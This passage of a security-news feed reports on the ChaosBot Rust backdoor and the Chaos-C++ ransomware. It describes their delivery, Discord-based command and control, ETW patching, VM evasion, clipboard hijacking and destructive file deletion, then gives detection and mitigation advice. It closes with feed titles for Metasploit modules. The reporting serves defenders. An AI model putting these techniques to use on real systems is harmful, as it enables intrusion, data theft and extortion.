			</div><div class="et_pb_row_inner et_pb_row_inner_2 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_2 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_2  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h3 class="premium-content">Join our <a class="green_color" href="https://www.patreon.com/posts/maximizing-your-87671900" target="_blank" rel="noopener sponsored">Patreon</a> Channel and Gain access to 70+ Exclusive Walkthrough Videos.</h3></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_0">
				
				
				
				
				<a href="https://www.patreon.com/posts/create-evasive-111421720" target="_blank"><span class="et_pb_image_wrap "><img fetchpriority="high" decoding="async" width="800" height="120" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png" alt="Patreon" title="Patreon" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw" class="wp-image-282931"></span></a>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_3">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_3  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Reading Time: 3 Minutes</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_4">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_4 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_4  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="669" data-end="680"><strong>Overview</strong></h2>
<p data-start="682" data-end="1363">Security firms have disclosed two related developments from the “Chaos” ecosystem: a new <strong data-start="771" data-end="810">Rust-based backdoor called ChaosBot</strong> used for reconnaissance and remote command execution, and an evolved <strong data-start="880" data-end="904">Chaos-C++ ransomware</strong> family that now includes destructive deletion and clipboard-hijacking capabilities. The backdoor was <a href="https://www.esentire.com/blog/new-rust-malware-chaosbot-uses-discord-for-command-and-control" target="_blank" rel="noopener">detailed</a> by <strong data-start="1018" data-end="1030">eSentire</strong>, which first observed activity in a financial-services environment in late September 2025; Fortinet’s FortiGuard Labs described the new ransomware variant and its tactics. Together the findings show a multi-vector campaign combining credential abuse, phishing, DLL sideloading and unconventional command-and-control (C2) channels.</p>
<hr data-start="1365" data-end="1368">
<h2 data-start="1370" data-end="1397"><strong>How ChaosBot is deployed</strong></h2>
<p data-start="1399" data-end="1976">eSentire’s investigation tied initial access to <strong data-start="1447" data-end="1474">compromised credentials</strong>: a VPN credential and an over-privileged Active Directory account named <code data-start="1547" data-end="1563">serviceaccount</code>. Using these credentials, the attackers used <strong data-start="1609" data-end="1616">WMI</strong> to run remote commands across the environment and stage the backdoor deployment. Other observed delivery methods include phishing messages carrying a malicious Windows <strong data-start="1785" data-end="1792">LNK</strong> shortcut that launches a PowerShell one-liner to fetch and run the payload, while displaying a decoy PDF (example: spoofed State Bank of Vietnam correspondence) to distract victims.</p>
<hr data-start="1978" data-end="1981">
<h2 data-start="1983" data-end="2022"><strong>Technical profile: ChaosBot behavior</strong></h2>
<p data-start="2024" data-end="2069">Key technical traits of <strong data-start="2048" data-end="2060">ChaosBot</strong> include:</p>
<ul>
<li data-start="2073" data-end="2262"><strong data-start="2073" data-end="2100">Language &amp; persistence:</strong> The backdoor is written in <strong data-start="2128" data-end="2136">Rust</strong>, with a DLL payload (<code data-start="2158" data-end="2174">msedge_elf.dll</code>) that is <strong data-start="2184" data-end="2202">DLL-sideloaded</strong> via a bundled Edge helper binary (<code data-start="2237" data-end="2258">identity_helper.exe</code>).</li>
<li data-start="2265" data-end="2524"><strong data-start="2265" data-end="2284">C2 via Discord:</strong> Operators use Discord user accounts (notably <code data-start="2330" data-end="2343">chaos_00019</code> and <code data-start="2348" data-end="2360">lovebb0024</code>) and create channels named after victim hostnames to issue commands and exfiltrate data — a lightweight, resilient C2 channel that blends in with benign traffic.</li>
<li data-start="2527" data-end="2818"><strong data-start="2527" data-end="2556">Proxy &amp; lateral movement:</strong> The implant downloads a <strong data-start="2581" data-end="2609">fast reverse proxy (FRP)</strong> to open ingress into the compromised network and maintain persistent remote access. Attempts were also made to configure <strong data-start="2731" data-end="2749">VS Code Tunnel</strong> as an alternate backdoor, though those attempts reportedly failed.</li>
<li data-start="2821" data-end="3023"><strong data-start="2821" data-end="2838">Capabilities:</strong> Supported commands observed include <code data-start="2875" data-end="2882">shell</code> (execute PowerShell/commands), <code data-start="2914" data-end="2919">scr</code> (screenshot capture), <code data-start="2942" data-end="2952">download</code> (pull files), and <code data-start="2971" data-end="2979">upload</code> (push files back to the Discord channel).</li>
<li data-start="3026" data-end="3263"><strong data-start="3026" data-end="3038">Evasion:</strong> New variants employ ETW evasion by patching <code data-start="3083" data-end="3104">ntdll!EtwEventWrite</code> (first instructions patched to neutralize tracing) and check MAC address prefixes commonly used by VMware/VirtualBox to avoid execution in VMs or sandboxes.</li>
</ul>
<p> </p>
<p><img decoding="async" class="aligncenter" src="https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/New-Rust-Malware-ChaosBot-Figure-2.png" alt="Attack Chain diagram">Figure 2 – Attack Chain diagram – esentire.com</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_5 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><strong>See Also: So, you want to be a hacker?<br>
</strong><strong><a href="https://www.blackhatethicalhacking.com/courses/" target="_blank" rel="noopener noreferrer">Offensive Security, Bug Bounty Courses</a></strong></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_6  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_7  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h4><span><strong>Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.</strong></span></h4>
<p><a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" class="alignnone wp-image-276050 size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png" alt="" width="800" height="120" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw"></a></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_8  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="3270" data-end="3335"><strong>Chaos-C++ ransomware: destructive tactics and clipboard hijack</strong></h2>
<p data-start="3337" data-end="3442">Fortinet <a href="https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous" target="_blank" rel="noopener">reports</a> the <strong data-start="3358" data-end="3382">Chaos-C++ ransomware</strong> family has adopted more aggressive monetization techniques:</p>
<ul>
<li data-start="3446" data-end="3616"><strong data-start="3446" data-end="3471">Destructive deletion:</strong> The ransomware can <strong data-start="3491" data-end="3540">irreversibly delete files larger than ~1.3 GB</strong> instead of encrypting them, escalating the destructive impact on victims.</li>
<li data-start="3619" data-end="3811"><strong data-start="3619" data-end="3643">Clipboard hijacking:</strong> The malware monitors the system clipboard and <strong data-start="3690" data-end="3727">replaces cryptocurrency addresses</strong> (e.g., Bitcoin) with attacker-controlled wallet addresses to intercept transfers.</li>
<li data-start="3814" data-end="4207"><strong data-start="3814" data-end="3847">Execution flow &amp; persistence:</strong> The downloader masquerades as utilities like <strong data-start="3893" data-end="3918">System Optimizer v2.1</strong>. On execution it checks for <code data-start="3947" data-end="3970">%APPDATA%\READ_IT.txt</code> to decide behavior: if present, it goes into monitoring mode (clipboard watch); otherwise, it checks for admin rights and then disables recovery options before encrypting files under ~50 MB and skipping those between 50 MB and 1.3 GB.</li>
<li data-start="4210" data-end="4388"><strong data-start="4210" data-end="4239">Robust crypto + fallback:</strong> Encrypts with symmetric/asymmetric methods and includes an XOR fallback, reportedly to ensure file corruption even if cryptographic routines fail.</li>
</ul>
<hr data-start="4390" data-end="4393">
<h2 data-start="4395" data-end="4436"><strong>Operational picture &amp; observed targets</strong></h2>
<ul>
<li data-start="4440" data-end="4652">eSentire’s detection was tied to a financial-services customer, but the tactics are broadly applicable to enterprise environments that expose services to VPN/remote access or run legacy/high-privilege accounts.</li>
<li data-start="4655" data-end="4854">The weaponization of Discord — a legitimate collaboration platform — complicates egress filtering and detection, while LNK delivery and DLL sideloading remain effective at bypassing naive defences.</li>
<li data-start="4857" data-end="5064">The combination of credential abuse, remote command execution via WMI, FRP tunnels, and file exfiltration points to a capable, opportunistic attacker motivated by access, persistence and potential extortion.</li>
</ul></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_9 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/articles/integrating-metasploit-with-beef-framework-for-advanced-post-exploitation-attacks/" target="_blank" rel="noopener noreferrer">Integrating Metasploit with BeEF Framework for advanced post-exploitation attacks<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_10  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News Adsense Adcode Horizontal --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_11 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/tools/formpoison/" target="_blank" rel="noopener">Offensive Security Tool: FormPoison</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_12  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<h2 data-start="5071" data-end="5107"><strong>Detection and mitigation guidance</strong></h2>
<p data-start="5109" data-end="5178">Practical steps to detect and mitigate ChaosBot / Chaos-C++ activity:</p>
<p data-start="5183" data-end="5209"><strong data-start="5183" data-end="5209">Credentials &amp; accounts</strong></p>
<ul>
<li data-start="5215" data-end="5329">Immediately rotate VPN and service account credentials and enforce <strong data-start="5282" data-end="5326">unique, least-privilege service accounts</strong>.</li>
<li data-start="5335" data-end="5413">Require <strong data-start="5343" data-end="5380">multi-factor authentication (MFA)</strong> for VPN and any remote access.</li>
<li data-start="5419" data-end="5573">Audit <code data-start="5425" data-end="5441">serviceaccount</code> and other privileged AD accounts — remove unnecessary privileges and enable Just-In-Time (JIT) or Just-Enough-Admin (JEA) controls.</li>
</ul>
<p><strong data-start="5578" data-end="5602">Endpoint &amp; telemetry</strong></p>
<ul>
<li data-start="5608" data-end="5770">Detect suspicious <strong data-start="5626" data-end="5645">DLL sideloading</strong> (e.g., <code data-start="5653" data-end="5674">identity_helper.exe</code> launching nonstandard DLLs) and monitor processes that spawn network proxies or FRP binaries.</li>
<li data-start="5776" data-end="5890">Alert on <strong data-start="5785" data-end="5810">PowerShell one-liners</strong> launched from LNK files, Office/Explorer contexts, or from temporary folders.</li>
<li data-start="5896" data-end="6059">Monitor for <strong data-start="5908" data-end="5929">patched ETW calls</strong> (unexpected modifications to <code data-start="5959" data-end="5980">ntdll!EtwEventWrite</code>) and for MAC addresses or environment checks that indicate VM-evasion logic.</li>
<li data-start="6065" data-end="6194">Flag unexpected <strong data-start="6081" data-end="6099">VS Code Tunnel</strong> / remote-access service registrations and anomalous outbound connections to Discord endpoints.</li>
</ul>
<p data-start="6199" data-end="6219"><strong data-start="6199" data-end="6219">Network &amp; egress</strong></p>
<ul>
<li data-start="6225" data-end="6334">Restrict outbound access to <strong data-start="6253" data-end="6264">Discord</strong> or require proxying/inspection for allowed collaboration platforms.</li>
<li data-start="6340" data-end="6429">Block or inspect connections to FRP endpoints and other dynamic reverse proxy services.</li>
<li data-start="6435" data-end="6563">Implement strict <strong data-start="6452" data-end="6472">egress filtering</strong> and TLS inspection where feasible to detect C2 traffic hiding inside legitimate protocols.</li>
</ul>
<p data-start="6568" data-end="6595"><strong data-start="6568" data-end="6595">Email &amp; user resilience</strong></p>
<ul>
<li data-start="6601" data-end="6729">Block LNK attachments at email gateway or convert attachments to safe previews; disallow execution from user download folders.</li>
<li data-start="6735" data-end="6885">Educate users to treat unsolicited archives/shortcuts and unexpected PDFs cautiously — particularly those that ask to “open” or contain attachments.</li>
</ul>
<p data-start="6890" data-end="6912"><strong data-start="6890" data-end="6912">Backups &amp; recovery</strong></p>
<ul>
<li data-start="6918" data-end="7069">Maintain <strong data-start="6927" data-end="6960">air-gapped, immutable backups</strong> and test restore processes. Given the ransomware’s destructive options, backups are a critical mitigation.</li>
<li data-start="7075" data-end="7172">Restrict filesystem and backup service permissions so ransomware processes cannot delete backups.</li>
</ul>
<p data-start="7177" data-end="7196"><strong data-start="7177" data-end="7196">Hunt &amp; response</strong></p>
<ul>
<li data-start="7202" data-end="7424">Hunt for indicators: unusual Discord API usage, FRP binaries, <code data-start="7264" data-end="7280">msedge_elf.dll</code> or <code data-start="7284" data-end="7305">identity_helper.exe</code> anomalies, PowerShell downloaders, new persistent services, and CREATE/WRITE operations for <code data-start="7398" data-end="7421">%APPDATA%\READ_IT.txt</code>.</li>
<li data-start="7430" data-end="7565">Isolate affected hosts, collect memory and disk images for forensic analysis, and look for lateral movement via WMI or scheduled tasks.</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_13 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/news/redis-fixes-13-year-old-cvss-10-0-redishell-bug-allowing-remote-code-execution/" target="_blank" rel="noopener noreferrer">Redis Fixes 13-Year-Old CVSS 10.0 “RediShell” Bug Allowing Remote Code Execution</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_14  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote><p><em>Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? </em><em>If you want to express your idea in an article contact us here for a quote: <strong>info@blackhatethicalhacking.com</strong></em></p></blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_15  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><em>Source: thehackernews.com</em></strong></p>
<p><a href="https://thehackernews.com/2025/10/new-rust-based-malware-chaosbot-hijacks.html" target="_blank" rel="noopener"><strong>Source Link</strong></a></p></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_1 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_image et_pb_image_1 store-img">
				
				
				
				
				<a href="https://store.blackhatethicalhacking.com/" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="1142" height="500" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png" alt="Merch" title="Store" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png 1142w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-980x429.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-480x210.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1142px, 100vw" class="wp-image-271829"></span></a>
			</div><div class=" et_pb_logo_slider  et_pb_logo_slider_0 ">
                
            </div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_1    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_0 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent News</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/redis-fixes-13-year-old-cvss-10-0-redishell-bug-allowing-remote-code-execution/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-31-300x150.png" alt="Redis Fixes 13-Year-Old CVSS 10.0 “RediShell” Bug Allowing Remote Code Execution" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/redis-fixes-13-year-old-cvss-10-0-redishell-bug-allowing-remote-code-execution/" target="_self">Redis Fixes 13-Year-Old CVSS 10.0 “RediShell” Bug Allowing Remote Code Execution</a></h3><time class="rpwe-time published" datetime="2025-10-07T11:48:42+02:00">October 7, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/crimson-collective-claims-red-hat-gitlab-breach-570gb-data-stolen/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-29-300x150.png" alt="Crimson Collective Claims Red Hat GitLab Breach, 570GB Data Stolen" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/crimson-collective-claims-red-hat-gitlab-breach-570gb-data-stolen/" target="_self">Crimson Collective Claims Red Hat GitLab Breach, 570GB Data Stolen</a></h3><time class="rpwe-time published" datetime="2025-10-02T10:53:22+02:00">October 2, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/cisa-adds-critical-sudo-chroot-flaw-to-kev/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/09/877x440-Images-for-the-News-posts-27-300x150.png" alt="CISA Adds Critical Sudo “chroot” Flaw to KEV" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/cisa-adds-critical-sudo-chroot-flaw-to-kev/" target="_self">CISA Adds Critical Sudo “chroot” Flaw to KEV</a></h3><time class="rpwe-time published" datetime="2025-09-30T09:10:07+02:00">September 30, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/kali-linux-2025-3-released-with-10-new-tools-nexmon-wi-fi-injection-for-raspberry-pi-and-vagrant-updates/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/09/877x440-Images-for-the-News-posts-26-300x150.png" alt="Kali Linux 2025.3 released with 10 New Tools, Nexmon Wi-Fi Injection for Raspberry Pi and Vagrant Updates" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/kali-linux-2025-3-released-with-10-new-tools-nexmon-wi-fi-injection-for-raspberry-pi-and-vagrant-updates/" target="_self">Kali Linux 2025.3 released with 10 New Tools, Nexmon Wi-Fi Injection for Raspberry Pi and Vagrant Updates</a></h3><time class="rpwe-time published" datetime="2025-09-25T10:10:01+02:00">September 25, 2025</time><div class="rpwe-summary"></div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="et_pb_widget widget_block"><h3>EXPLORE OUR STORE</h3></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="233" height="300" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Tshirt-233x300.png" class="image wp-image-280999  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="300" height="280" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/RedTeamers-e1725807706904-300x280.png" class="image wp-image-281001  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="711" height="1024" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Hoodie-711x1024.png" class="image wp-image-281002  attachment-large size-large" alt=""></a></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget"> <!-- News Adsense Adcode --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div></div>
			</div><div class="et_pb_module et_pb_sidebar_1 news-sidebar2 et_animated et_pb_widget_area clearfix et_pb_widget_area_left  et_pb_text_align_justified et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p>
</div><div class="et_pb_widget widget_block"><hr>
<a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://discord.gg/EYMqveWXkv"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/10/Discord.png"></a>
<h3>Join our Community</h3></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/news/chaosbot-rust-backdoor-uses-discord-c2-chaos-ransomware-adds-destructive-clipboard-hijack-features/">ChaosBot: Rust Backdoor Uses Discord C2 — Chaos Ransomware Adds Destructive &amp; Clipboard-Hijack Features</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module]]></title>
<description><![CDATA[Topic: GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module Risk: Medium Text:# Titles: GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module   # Author: nu11secur1ty  # Date: 10/06/2025  # Vend...]]></description>
<link>https://tsecurity.de/de/3026784/sicherheitsluecken/gaatitrack-10-copyright2025-multiple-sqli-metasploit-module/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3026784/sicherheitsluecken/gaatitrack-10-copyright2025-multiple-sqli-metasploit-module/</guid>
<pubDate>Tue, 07 Oct 2025 23:20:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module Risk: Medium Text:# Titles: GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module   # Author: nu11secur1ty  # Date: 10/06/2025  # Vend...]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)]]></title>
<description><![CDATA[XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)]]></description>
<link>https://tsecurity.de/de/3010940/poc/webapps-xwiki-platform-151010-metasploit-module-for-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3010940/poc/webapps-xwiki-platform-151010-metasploit-module-for-remote-code-execution-rce/</guid>
<pubDate>Mon, 29 Sep 2025 18:07:10 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2025.3 released with 10 New Tools, Nexmon Wi-Fi Injection for Raspberry Pi and Vagrant Updates]]></title>
<description><![CDATA[Kali Linux 2025.3 released with 10 New Tools, Nexmon Wi-Fi Injection for Raspberry Pi and Vagrant Updates
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 5
			
			
				
				
				
				
				



			
			
				
				
				
				
			
				
...]]></description>
<link>https://tsecurity.de/de/3003471/it-security-nachrichten/kali-linux-20253-released-with-10-new-tools-nexmon-wi-fi-injection-for-raspberry-pi-and-vagrant-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3003471/it-security-nachrichten/kali-linux-20253-released-with-10-new-tools-nexmon-wi-fi-injection-for-raspberry-pi-and-vagrant-updates/</guid>
<pubDate>Thu, 25 Sep 2025 10:19:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_0 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_0   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_0">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_0 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">Kali Linux 2025.3 released with 10 New Tools, Nexmon Wi-Fi Injection for Raspberry Pi and Vagrant Updates</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_1">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_1 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-286388 entry-meta load-static">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">5</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_1  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_2 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_2 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_2  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h3 class="premium-content">Join our <a class="green_color" href="https://www.patreon.com/posts/maximizing-your-87671900" target="_blank" rel="noopener sponsored">Patreon</a> Channel and Gain access to 70+ Exclusive Walkthrough Videos.</h3></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_0">
				
				
				
				
